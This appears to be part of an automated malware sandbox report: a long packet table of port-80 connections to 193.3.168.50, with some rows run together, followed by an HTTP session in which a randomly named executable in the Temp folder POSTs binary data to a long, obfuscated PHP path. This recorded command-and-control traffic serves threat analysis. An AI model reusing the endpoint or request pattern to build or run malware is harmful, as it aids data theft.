Dec 5, 2024 10:54:21.629386902 CET  80           49842      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:21.674506903 CET  49842        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:21.749331951 CET  80           49844      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:21.799509048 CET  49844        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:21.879806042 CET  49842        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:21.879884958 CET  49844        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:21.880692959 CET  49849        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:21.999988079 CET  80           49842      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:22.000046015 CET  49842        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:22.000463009 CET  80           49844      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:22.000505924 CET  49844        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:22.000560045 CET  80           49849      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:22.000633955 CET  49849        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:22.000765085 CET  49849        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:22.121051073 CET  80           49849      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:22.346514940 CET  49849        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:22.466310024 CET  80           49849      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:23.239417076 CET  80           49849      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:23.283884048 CET  49849        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:23.473486900 CET  80           49849      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:23.518254042 CET  49849        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:23.625763893 CET  49849        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:23.626118898 CET  49855        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:23.643695116 CET  49835        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:23.746633053 CET  80           49855      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:23.746700048 CET  49855        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:23.746805906 CET  80           49849      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:23.746857882 CET  49855        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:23.746859074 CET  49849        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:23.866554022 CET  80           49855      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:24.096457005 CET  49855        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:24.216681957 CET  80           49855      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:24.985985994 CET  80           49855      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:25.033895969 CET  49855        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:25.221291065 CET  80           49855      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:25.268265963 CET  49855        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:25.342168093 CET  49861        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:25.462220907 CET  80           49861      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:25.462359905 CET  49861        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:25.462532997 CET  49861        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:25.582459927 CET  80           49861      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:25.815372944 CET  49861        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:25.937113047 CET  80           49861      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:26.644435883 CET  49863        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:26.644650936 CET  49861        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:26.700790882 CET  80           49861      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:26.700845003 CET  49861        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:26.764204979 CET  80           49863      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:26.764256001 CET  49863        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:26.764516115 CET  49863        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:26.764786959 CET  80           49861      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:26.764831066 CET  49861        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:26.783737898 CET  49867        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:26.884690046 CET  80           49863      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:26.903412104 CET  80           49867      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:26.903472900 CET  49867        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:26.903601885 CET  49867        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:27.023570061 CET  80           49867      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:27.112154961 CET  49863        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:27.231942892 CET  80           49863      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:27.231983900 CET  80           49863      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:27.252861023 CET  49867        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:27.372713089 CET  80           49867      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:28.002809048 CET  80           49863      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:28.049544096 CET  49863        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:28.141382933 CET  80           49867      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:28.190136909 CET  49867        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:28.237238884 CET  80           49863      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:28.283912897 CET  49863        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:28.373301029 CET  80           49867      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:28.424551964 CET  49867        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:28.542870998 CET  49863        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:28.542944908 CET  49867        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:28.543247938 CET  49869        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:28.662976027 CET  80           49863      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:28.662992001 CET  80           49869      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:28.663038015 CET  49863        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:28.663081884 CET  49869        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:28.663238049 CET  49869        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:28.663353920 CET  80           49867      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:28.663414955 CET  49867        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:28.782953978 CET  80           49869      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:29.018651962 CET  49869        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:29.138639927 CET  80           49869      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:29.900537014 CET  80           49869      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:29.955787897 CET  49869        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:30.133487940 CET  80           49869      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:30.174526930 CET  49869        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:30.247690916 CET  49855        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:30.247782946 CET  49754        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:30.247864008 CET  49758        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:30.252315044 CET  49869        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:30.252707958 CET  49875        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:30.373420954 CET  80           49869      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:30.373492002 CET  49869        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:30.373557091 CET  80           49875      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:30.373629093 CET  49875        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:30.373761892 CET  49875        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:30.493458986 CET  80           49875      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:30.721587896 CET  49875        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:30.841356993 CET  80           49875      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:31.612174034 CET  80           49875      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:31.658937931 CET  49875        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:31.845249891 CET  80           49875      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:31.893291950 CET  49875        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:31.968871117 CET  49881        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:32.088670969 CET  80           49881      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:32.089644909 CET  49881        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:32.089801073 CET  49881        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:32.209647894 CET  80           49881      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:32.440354109 CET  49881        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:32.560295105 CET  80           49881      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:33.264539957 CET  49885        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:33.327086926 CET  49881        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:33.327554941 CET  80           49881      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:33.327606916 CET  49881        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:33.384382010 CET  80           49885      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:33.386863947 CET  49885        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:33.389946938 CET  49885        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:33.447200060 CET  80           49881      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:33.447248936 CET  49881        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:33.509627104 CET  80           49885      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:33.564383984 CET  49887        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:33.684158087 CET  80           49887      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:33.684235096 CET  49887        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:33.684422970 CET  49887        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:33.737289906 CET  49885        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:33.804322004 CET  80           49887      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:33.857237101 CET  80           49885      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:33.857256889 CET  80           49885      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:34.034198046 CET  49887        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:34.154093981 CET  80           49887      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:34.626430988 CET  80           49885      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:34.674542904 CET  49885        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:34.861550093 CET  80           49885      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:34.908914089 CET  49885        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:34.934099913 CET  80           49887      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:34.987287998 CET  49887        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:35.169424057 CET  80           49887      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:35.221416950 CET  49887        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:35.296947002 CET  49885        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:35.296947002 CET  49887        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:35.297266006 CET  49890        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:35.416986942 CET  80           49890      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:35.417385101 CET  80           49885      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:35.417637110 CET  49885        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:35.417653084 CET  49890        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:35.417795897 CET  49890        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:35.418483973 CET  80           49887      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:35.418556929 CET  49887        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:35.537471056 CET  80           49890      193.3.168.50   192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:35.810736895 CET4989080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:35.930720091 CET8049890193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:36.661237955 CET8049890193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:36.705791950 CET4989080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:36.893187046 CET8049890193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:36.940172911 CET4989080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:37.016288042 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:37.136054039 CET8049895193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:37.136122942 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:37.136306047 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:37.256185055 CET8049895193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:37.487129927 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:37.606946945 CET8049895193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:38.377856970 CET8049895193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:38.424552917 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.613437891 CET8049895193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:38.658910036 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.734179020 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.734474897 CET4990180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.854379892 CET8049895193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:38.854393005 CET8049901193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:38.854439020 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.854494095 CET4990180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.854660034 CET4990180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.974884033 CET8049901193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:39.206872940 CET4990180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:39.326673985 CET8049901193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:39.878719091 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:39.878743887 CET4990180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:39.998595953 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:39.998631954 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:39.998816013 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:39.998816967 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:39.998827934 CET8049901193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:39.998924971 CET4990180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:40.118397951 CET8049907193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:40.118561029 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:40.118938923 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:40.122859955 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:40.242625952 CET8049907193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:40.346879959 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:40.466850996 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:40.466936111 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:40.476926088 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:40.596898079 CET8049907193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.236069918 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.283915997 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.356594086 CET8049907193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.408940077 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.469062090 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.518285990 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.588990927 CET8049907193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.643316031 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.708440065 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.708466053 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.708894968 CET4990980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.828720093 CET8049909193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.828790903 CET4990980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.829008102 CET4990980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.831865072 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.831904888 CET8049907193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.831921101 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.831945896 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.948712111 CET8049909193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:42.174653053 CET4990980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:42.294801950 CET8049909193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:43.067507982 CET8049909193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:43.109121084 CET4990980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:43.301377058 CET8049909193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:43.346432924 CET4990980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:43.425920010 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:43.545669079 CET8049915193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:43.545769930 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:43.545988083 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:43.665745020 CET8049915193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:43.929065943 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:44.048831940 CET8049915193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:44.791619062 CET8049915193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:44.846426010 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.051865101 CET8049915193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:45.096436977 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.173661947 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.173868895 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.293642044 CET8049921193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:45.293709993 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.293869019 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.293927908 CET8049915193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:45.293970108 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.413681030 CET8049921193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:45.643388033 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.834358931 CET8049921193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:46.475893974 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:46.476365089 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:46.531136036 CET8049921193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:46.534207106 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:46.595797062 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:46.595881939 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:46.596348047 CET8049921193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:46.596430063 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:46.743530989 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:46.863260984 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:47.098803997 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:47.219338894 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:47.219352007 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:47.308856964 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:47.428689957 CET8049928193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:47.428767920 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:47.428898096 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:47.548547029 CET8049928193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:47.784110069 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:47.836030960 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:47.877685070 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:47.904010057 CET8049928193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:48.068979979 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:48.115262032 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:48.669554949 CET8049928193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:48.724849939 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:48.905261040 CET8049928193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:48.955797911 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.034586906 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.034656048 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.034909010 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.154620886 CET8049934193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:49.154690027 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.154870987 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:49.154923916 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.155143023 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.155296087 CET8049928193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:49.155343056 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.274992943 CET8049934193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:49.523631096 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.643599987 CET8049934193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:50.396166086 CET8049934193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:50.440176010 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:50.629112005 CET8049934193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:50.629447937 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:50.749583960 CET8049934193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:50.749650955 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:50.751874924 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:50.871639013 CET8049939193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:50.871763945 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:50.871925116 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:50.991636038 CET8049939193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:51.221606016 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:51.341970921 CET8049939193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:52.109564066 CET8049939193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:52.174552917 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:52.345233917 CET8049939193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:52.396374941 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:52.590723038 CET4994280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:52.590724945 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:52.710592031 CET8049942193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:52.710942984 CET8049939193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:52.712915897 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:52.716839075 CET4994280192.168.2.4193.3.168.50
• 193.3.168.50
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:16.710395098 CET | 440 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:53:17.066200972 CET | 344 | OUT | Data Raw: (binary request body; hex and ASCII dump omitted)
Dec 5, 2024 10:53:17.935105085 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:17.949781895 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: (chunked response body, first chunk size 0x56c; hex and ASCII dump omitted)
Dec 5, 2024 10:53:17.949829102 CET | 350 | IN | Data Raw: (continuation of the chunked response body; hex and ASCII dump omitted)
Dec 5, 2024 10:53:17.981781960 CET | 416 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
